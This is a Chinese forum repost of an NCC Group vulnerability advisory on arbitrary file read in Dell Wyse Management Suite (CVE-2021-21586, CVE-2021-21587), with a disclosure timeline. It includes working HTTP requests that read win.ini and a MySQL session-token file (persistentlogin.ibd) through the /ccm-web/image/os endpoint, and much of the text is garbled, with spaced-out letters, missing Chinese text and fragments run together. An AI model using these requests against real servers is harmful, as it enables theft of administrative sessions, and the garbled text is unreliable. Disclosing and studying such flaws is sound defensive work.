搜索

[29073] 2021-07-18_【漏洞预警】戴尔瘦客户端硬件在DellWyse管理套件中读取任意文件(CVE-2021-21586、CVE-2021-2

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2021-07-18_【漏洞预警】戴尔瘦客户端硬件在DellWyse管理套件中读取任意文件(CVE-2021-21586、CVE-2021-2 D e l l   W y s e   C V E - 2 0 2 1 - 2 1 5 8 6 C V E - 2 0 2 1 - 2 O t s   2 0 2 1 - 0 7 - 1 8 O t s W y s e   M a n a g e m e n t   S u i t e   ( W M S )   W y s e   M a n a g e m e n t   S u i t e   W e b   使   W e b   使   W M S   /   C C M - / /   O S G E T   / c c m - w e b / i m a g e / o s   f i l e P a t h = c : w i n d o w s & f i l e N a m e = w i n . i n i P U T   / c c m - w e b / i m a g e / p u l l / a / b   访 访   B I O S     V N C   访 使   W y s e     I D   使   W y s e     I D   W M S     T L S     W M S     T L S     D N S     D H C P   使   I D   M y S Q L     W M S     J S E S S I O N I D   c o o k i e     W y s e   M a n a g e m e n t   S u i t e   3 . 3   V e n d o r :   D e l l V e n d o r   U R L :   h t t p s : / / w w w . d e l l . c o m / s u p p o r t / h o m e / e n - u s / p r o d u c t - s u p p o r t / p r o d u c t / w y s e - w m s / d r i v e r s   V e r s i o n s   a f f e c t e d :   P r i o r   t o   v e r s i o n   3 . 3 S y s t e m s   A f f e c t e d :   A n y A u t h o r :   S t e p h e n   T o m k i n s o n   s t e p h e n . t o m k i n s o n @ n c c g r o u p . c o m A d v i s o r y   U R L   /   C V E   I d e n t i f i e r :   h t t p s : / / w w w . d e l l . c o m / s u p p o r t / k b d o c / e n - u s / 0 0 0 1 8 9 3 6 3 / d s a - 2 0 2 1 - 1 3 7 - d e l l - w y s e - m a n a g e m e n t - s u i t e - w m s - s e c u r i t y - u p d a t e - f o r - m u l t i p l e - v u l n e r a b i l i t i e s   C V E - 2 0 2 1 - 2 1 5 8 6 ,   C V E - 2 0 2 1 - 2 1 5 8 7 R i s k :   H i g h     c a n   l e a d   t o   c o m p r o m i s e   o f   a d m i n i s t r a t i v e   s e s s i o n s P U T   / c c m - w e b / i m a g e / p u l l / a / b   H T T P / 1 . 1 H o s t :   [ r e d a c t e d ] X - S t r a t u s - d e v i c e - i d : w y s e 1 0 6 [ r e d a c t e d ] 3 1 4 9 H T T P / 1 . 1   5 0 0   C a c h e - C o n t r o l :   p r i v a t e E x p i r e s :   T h u ,   0 1   J a n   1 9 7 0   0 0 : 0 0 : 0 0   G M T S e t - C o o k i e :   J S E S S I O N I D = 4 4 4 3 1 6 5 6 4 6 F D A 1 B A 4 1 7 D 0 8 9 1 7 B F D 1 7 C 7 ;   P a t h = / c c m - w e b ;   S e c u r e ;   H t t p O n l y X - C o n t e n t - T y p e - O p t i o n s :   n o s n i f f C a c h e - C o n t r o l :   n o - c a c h e ,   n o - s t o r e ,   m a x - a g e = 0 ,   m u s t - r e v a l i d a t e P r a g m a :   n o - c a c h e E x p i r e s :   T h u ,   0 1   J a n   1 9 7 0   0 0 : 0 0 : 0 0   G M T C o n t e n t - T y p e :   t e x t / p l a i n ; c h a r s e t = U T F - 8 C o n t e n t - L e n g t h :   1 0 7 D a t e :   F r i ,   1 6   A p r   2 0 2 1   1 0 : 5 1 : 5 1   G M T C o n n e c t i o n :   c l o s e E : P r o g r a m   F i l e s D E L L S o f t w a r e r e p o s i t o r y i m a g e P u l l s t a g i n g a b   ( T h e   s y s t e m   c a n n o t   f i n d   t h e   p a t h   s p e c i f i e d ) G E T   / c c m - w e b / i m a g e / o s ? f i l e P a t h = E : P r o g r a m   F i l e s D E L L W M S D a t a b a s e S Q L s t r a t u s & f i l e N a m e =   p e r s i s t e n t l o g i n . i b d   H T T P / 1 . 1 H o s t :   [ r e d a c t e d ] X - S t r a t u s - d e v i c e - i d : w y s e 1 0 6 [ r e d a c t e d ] 3 1 4 9
N C C   G r o u p   N o t i f i e s   V e n d o r :   7 t h   M a y   2 0 2 1 V e n d o r   R e p l i e s   R e q u e s t i n g   M o r e   D e t a i l s :   1 1 t h   M a y   2 0 2 1 N C C   G r o u p   S e n d s   R e q u e s t e d   i n f o r m a t i o n :   1 1 t h   M a y   2 0 2 1 V e n d o r   C o n f i r m s   T h e   V u l n e r a b i l i t y :   2 0 t h   M a y   2 0 2 1 N C C   G r o u p   R e q u e s t s   a   P a t c h   D a t e :   1 8 t h   J u n e   2 0 2 1 V e n d o r   R e s p o n s e   W i t h   D a t e :   1 8 t h   J u n e   2 0 2 1 P a t c h   &   A d v i s o r y   P u b l i s h e d :   J u l y   6 t h   2 0 2 1
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理